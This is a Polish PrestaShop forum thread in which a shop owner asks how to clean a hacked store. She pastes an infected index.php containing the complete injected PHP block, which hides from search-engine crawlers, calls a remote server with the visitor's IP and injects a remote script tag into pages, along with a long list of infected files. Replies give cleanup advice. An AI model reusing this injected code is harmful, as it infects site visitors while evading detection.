Jump to content
  • 0

Złośliwy kod dopisany do plików

xenaxx

Asked by xenaxx,

 Share

Question

xenaxx Newbie

xenaxx

Posted
Posted

Dostałam informację z serwera Hekko, że mam dopisane złośliwe kody do plików.Jest tego bardzo dużo Mam prośbę proszę mi napisać czy mam usunąć całe pliki? Np.classes/order/index.php  itd.

czy dopisany kod. Skąd mam wiedzieć od którego miejsca jest dopisany złośliwy skrypt. Poniżej cały plik-  classes/order/index.php

 

 

<?php
/*
* 2007-2013 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2013 PrestaShop SA
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
 
header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
 
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: post-check=0, pre-check=0', false);
header('Pragma: no-cache');
 
header('Location: ../../');
exit;
 
 
 
#0620e8#
if (empty($obs)) {
    if ((substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) == '74.125') || preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])) {
    } else {
    error_reporting(0);
    @ini_set('display_errors', 0);
    if (!function_exists('__url_get_contents')) {
        function __url_get_contents($remote_url, $timeout)
        {
            if (function_exists('curl_exec')) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
                curl_close($ch);
            } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                $ctx = @stream_context_create(array('http' =>
                    array(
                        'timeout' => $timeout,
                    )
                ));
                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
                $handle = @fopen($remote_url, "r");
                $_url_get_contents_data = @stream_get_contents($handle);
            } else {
                $_url_get_contents_data = __file_get_url_contents($remote_url);
            }
            return $_url_get_contents_data;
        }
    }
    if (!function_exists('__file_get_url_contents')) {
        function __file_get_url_contents($remote_url)
        {
            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                $remote_url, $matches)
            ) {
                $protocol = strtolower($matches[1]);
                $host = $matches[2];
                $path = $matches[3];
            } else {
                // Bad remote_url-format
                return FALSE;
            }
            if ($protocol == "http") {
                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
            } else {
                // Bad protocol
                return FALSE;
            }
            if (!$socket) {
                // Error creating socket
                return FALSE;
            }
            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
            $len_written = @fwrite($socket, $request);
            if ($len_written === FALSE || $len_written != strlen($request)) {
                // Error sending request
                return FALSE;
            }
            $response = "";
            while (!@feof($socket) &&
                ($buf = @fread($socket, 4096)) !== FALSE) {
                $response .= $buf;
            }
            if ($buf === FALSE) {
                // Error reading response
                return FALSE;
            }
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
        }
    }
 
    if (empty($__var_to_echo) && empty($remote_domain)) {
        $_ip = $_SERVER['REMOTE_ADDR'];
        $obs = __url_get_contents($obs."?a=$_ip", 1);
            $__var_to_echo = '<script type="text/javascript" src="' . $obs . '?id=16022825"></script>';
            echo $__var_to_echo;
        }
    }
}
}
#/0620e8#
 
 
 
Uprzejmie informuję, że złośliwy kod dopisany jest do plików:
 
classes/order/index.php
classes/shop/index.php
classes/stock/index.php
classes/controller/index.php
classes/index.php
classes/webservice/index.php
classes/range/index.php
classes/pdf/index.php
classes/tax/index.php
classes/db/index.php
classes/exception/index.php
classes/module/index.php
classes/helper/index.php
cnnzib5dtlbzi20k/backups/index.php
cnnzib5dtlbzi20k/ajaxfilemanager/index.php
cnnzib5dtlbzi20k/ajaxfilemanager/ajax_login.php
cnnzib5dtlbzi20k/index.php
cnnzib5dtlbzi20k/export/index.php
cnnzib5dtlbzi20k/login.php
cnnzib5dtlbzi20k/tabs/index.php
cnnzib5dtlbzi20k/autoupgrade/index.php
cnnzib5dtlbzi20k/themes/index.php
cnnzib5dtlbzi20k/import/index.php
config/index.php
config/xml/index.php
controllers/front/index.php
controllers/index.php
controllers/admin/index.php
css/index.php
download/index.php
footer.php
header.php
index.php
js/admin_order.js
js/helpAccess.js
js/jquery/jquery-1.7.2.min.js
js/jquery/jquery-ui.will.be.removed.in.1.6.js
js/jquery/jquery.tinyscrollbar.min.js
js/jquery/index.php
js/jquery/jquery.mCustomScrollbar.js
js/jquery/jquery.mCustomScrollbar.concat.min.js
js/admin-categories-tree.js
js/form.js
js/checkLangPack.js
js/admin-dnd.js
js/login.js
js/notifications.js
js/sendMailTest.js
js/adminImport.js
js/tools.js
js/pluginDetect.js
js/gg-translate.js
js/attributesBack.js
js/index.php
js/hookLiveEdit.js
js/toggle.js
js/admin-translations.js
js/date.js
js/ajax.js
js/admin-scene-cropping.js
js/toolbar.js
js/admin.js
js/retro-compat.js.php
js/fileuploader.js
js/price.js
js/productTabsManager.js
js/cropper/cropper.js
js/cropper/builder.js
js/cropper/scriptaculous.js
js/cropper/index.php
js/cropper/loader.js
js/cropper/prototype.js
js/cropper/dragdrop.js
js/admin-products.js
js/tinymce.inc.js
jScrollPane-master/script/mwheelIntent.js
jScrollPane-master/script/jquery.jscrollpane.min.js
jScrollPane-master/script/jquery.mousewheel.js
jScrollPane-master/script/jquery.jscrollpane.js
jScrollPane-master/script/demo.js
localization/index.php
mails/en/index.php
mails/index.php
modules/cashondelivery/index.php
modules/themeinstallator/index.php
modules/themeinstallator/themeinstallator.js
modules/themeinstallator/script.js
modules/blockadvertising/index.php
modules/blocktopmenu/index.php
modules/statsregistrations/index.php
modules/homeslider/index.php
modules/customcontent/index.php
modules/statsstock/index.php
modules/feeder/index.php
modules/blockwishlist/index.php
modules/followup/index.php
modules/statsforecast/index.php
modules/statscatalog/index.php
modules/blocksocial/index.php
modules/blockcurrencies/index.php
modules/eceelotorderapi/index.php
modules/watermark/index.php
modules/graphxmlswfcharts/index.php
modules/statssales/index.php
modules/pscleaner/index.php
modules/blocksharefb/index.php
modules/statsbestproducts/index.php
modules/trackingfront/index.php
modules/blockreinsurance/index.php
modules/productscategory/index.php
modules/productscategory/productscategory.js
modules/statsvisits/index.php
modules/blocktags/index.php
modules/statsbestcustomers/index.php
modules/blockcontactinfos/index.php
modules/crossselling/index.php
modules/gridhtml/index.php
modules/homenewproducts/index.php
modules/carriercompare/index.php
modules/carriercompare/carriercompare.js
modules/blockrss/index.php
modules/cheque/index.php
modules/productcomments/index.php
modules/blockspecials/index.php
modules/statscheckup/index.php
modules/blockstore/index.php
modules/homefeatured/index.php
modules/shopgate/index.php
modules/blockcategories/ddsmoothmenu.js
modules/blockcategories/index.php
modules/paypal/index.php
modules/blocklayered/index.php
modules/blocklayered/blocklayered.js
modules/blocklayered/blocklayered-footer.js
modules/jirafe/index.php
modules/browsi/index.php
modules/blockpermanentlinks/index.php
modules/statsnewsletter/index.php
modules/favoriteproducts/favoriteproducts.js
modules/favoriteproducts/index.php
modules/bankwire/index.php
modules/pd_blockadvertising1/index.php
modules/mailalerts/index.php
modules/vatnumber/index.php
modules/blockmanufacturer/index.php
modules/authorizeaim/index.php
modules/htmlbox/script.js
modules/importerosc/index.php
modules/index.php
modules/blockmyaccount/index.php
modules/blockcontact/index.php
modules/gsitemap/index.php
modules/ebay/index.php
modules/statspersonalinfos/index.php
modules/cmshomepage/cmshomepage.php
modules/blockmenulavalamp/index.php
modules/statsbestmanufacturers/index.php
modules/shopimporter/index.php
modules/shopimporter/shopimporter.js
modules/statsequipment/index.php
modules/graphartichow/index.php
modules/giveit/index.php
modules/orderdelete/index.php
modules/blocklanguages/index.php
modules/graphvisifire/index.php
modules/sendtoafriend/index.php
modules/trustedshops/index.php
modules/blockadvertmulti/index.php
modules/gamification/index.php
modules/sekeywords/index.php
modules/statscarrier/index.php
modules/textmaster/index.php
modules/yotpo/headerScript.js
modules/siteverification/index.php
modules/statsgeolocation/index.php
modules/statsgeolocation/statsgeolocation.js
modules/pagesnotfound/index.php
modules/blockviewed/index.php
modules/blocksupplier/index.php
modules/pd_blockadvertising2/index.php
modules/blocknewproducts/index.php
modules/loyalty/index.php
modules/blocksearch/index.php
modules/blockpaymentlogo/index.php
modules/statssearch/index.php
modules/blocknewsletter/index.php
modules/blockbestsellers/index.php
modules/blockcms/index.php
modules/blockuserinfo/index.php
modules/statsbestcategories/index.php
modules/referralprogram/index.php
modules/dateofdelivery/index.php
modules/blockcategoriesmdi/ddlevelsmenu.js
modules/likeboxfree/script.js
modules/easyscroll/index.php
modules/statsorigin/index.php
modules/prestafraud/index.php
modules/cloudcache/index.php
modules/cloudcache/script.js
modules/statsproduct/index.php
modules/blockcustomerprivacy/index.php
modules/blocklink/index.php
modules/statsbestvouchers/index.php
modules/graphgooglechart/index.php
modules/editorial/index.php
modules/blockcart/ajax-cart.js
modules/blockcart/index.php
modules/payu/index.php
modules/hipay/index.php
modules/statsdata/index.php
modules/blockmyaccountfooter/blockmyaccountfooter.php
modules/statsbestsuppliers/index.php
modules/producttooltip/index.php
modules/pd_blockadvertising3/index.php
modules/newsletter/index.php
modules/statslive/index.php
myadmin/index.php
myadmin/templates/login.php
myadmin/scripts/03-jquery-ui-timepicker-addon.js
myadmin/scripts/04-jquery.base64.js
myadmin/scripts/jquery.cleditor.min.js
myadmin/scripts/myadmin.js
myadmin/scripts/myProfileConfig.js
myadmin/scripts/jquery.tablesorter.min.js
myadmin/scripts/02-jquery.ui.datepicker-pl.js
myadmin/scripts/jquery.cookie.js
myadmin/scripts/00-jquery-1.8.3.min.js
myadmin/scripts/jmenu.js
myadmin/scripts/01_jquery-ui-1.10.3.custom.min.js
myadmin/scripts/myLoadList.js
override/controllers/index.php
override/index.php
override/classes/index.php
pdf/index.php
themes/default/index.php
themes/index.php
tools/js_minify/index.php
tools/pclzip/index.php
tools/taasc/index.php
tools/parser_sql/index.php
tools/mobile_Detect/index.php
tools/fpdf/index.php
tools/swift/index.php
tools/profiling/index.php
tools/geoip/index.php
tools/smarty/index.php
tools/index.php
tools/pear_xml_parser/index.php
tools/tar/index.php
tools/tcpdf/index.php
tools/json/index.php
tools/payu/index.php
tools/minify_html/index.php
tools/pear/index.php
translations/index.php
translations/export/index.php
upload/index.php
webservice/index.php
 
Jeżeli nie uda mi się ich usunąć to skąd mam wziąć oryginalne pliki( nadmieniam, że cały program Prestashop był cały załadowany od razu na serwer).
Z góry dziękuję za pomoc. Od paru dni mi sklep nie działa i jestem załamana bo ci z serwera przywracali mi wykonać backup plików i ewentualnie baz danych.
Nic to nie pomogło bo cały syf wraca.
 
Link to comment
Share on other sites

13 answers to this question

Recommended Posts

  • 0
vekia Apprentice

vekia

Posted
Posted

nie usuwaj tych plików, bo sklep rzestanie działać całkowicie.

to co trzeba zrobić to zastąpić te pliki oryginalnymi.

 

problem trzeba najpierw wyeliminować, bo zastąpisz pliki a problem powróci. Przyczyną takiej infekcji może być:

- własny komputer który ma jakiś malware

- inny system cms taki jak wordpress albo joomla, one są dziurawe jak ser i przepuszczają malware. Więc jak masz takowy skrypt na serwerze (oprócz sklepu) to warto się mu przyglądnąc albo całkiem z niego zrezygnować

Link to comment
Share on other sites
  • 0
xenaxx Newbie

xenaxx

Posted
  • Author
Posted

Nie mam innego systemu typu Joomla ani wordpress na serwerze. Usuwałam ręcznie wirus:Win32/Rovnix.gen!C,wirus:DOS/Rovnix.GG w systemie awaryjnym ale pewnie coś pominęłam.Program antywirusowy odnajduje popup i niby usuwa ale ciągle to wraca ( gówniany program antywirusowy) Jestem poza miejscem gdzie znajduje się mój komputer dzisiaj zbieram informacje które mi pomogą pozbyć sie tego cholerstwa. 

Podpowiedz mi gdzie znajdę oryginalne pliki?

Link to comment
Share on other sites
  • 0
vekia Apprentice

vekia

Posted
Posted

Nie mam innego systemu typu Joomla ani wordpress na serwerze. Usuwałam ręcznie wirus:Win32/Rovnix.gen!C,wirus:DOS/Rovnix.GG w systemie awaryjnym ale pewnie coś pominęłam.Program antywirusowy odnajduje popup i niby usuwa ale ciągle to wraca ( gówniany program antywirusowy) Jestem poza miejscem gdzie znajduje się mój komputer dzisiaj zbieram informacje które mi pomogą pozbyć sie tego cholerstwa. 

Podpowiedz mi gdzie znajdę oryginalne pliki?

 

jaką wersję presty zainstalowano ? podeślę link do konkretnej paczki

Link to comment
Share on other sites
  • 0
xenaxx Newbie

xenaxx

Posted
  • Author
Posted

Witam, 

przysłali mi z serwera informację,

Uprzejmie informuję, że aktualnie nasz antywirus nie znajduje zainfekowanych plików na Pani usłudze hostingowej.

Skoro już nie mam na serwerze zarażonych plików to dlaczego chcąc wejść na stronę sklepu brandsvestis.pl z innych komputerów niż mój wyświetla się informacja, że - "Strona, na którą chcesz wejść zawiera złośliwe oprogramowanie!!"

Wchodziłam z różnych przeglądarek Google, Opera, Mozilla. Na wszystkich wyświetla się ten sam problem,pomijam fakt, że w BO jest to samo.
Jak rozwiązać ten problem??? Trwa to już tyle dni, że sklep mi przynosi straty nie do odpracowania.

Link to comment
Share on other sites
  • 0
xenaxx Newbie

xenaxx

Posted
  • Author
Posted

Mam pytanie ponieważ z serwera przysłali mi taka informację:

 W sprawie funkcjonowania skryptów Pani strony proszę zrobić aktualizację skryptów oraz pluginów to powinno wyeliminować błędne działanie.

skryptów.

Proszę o podpowiedź jak mam  to zrobić? :(

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to question listing
×
×
  • Create New...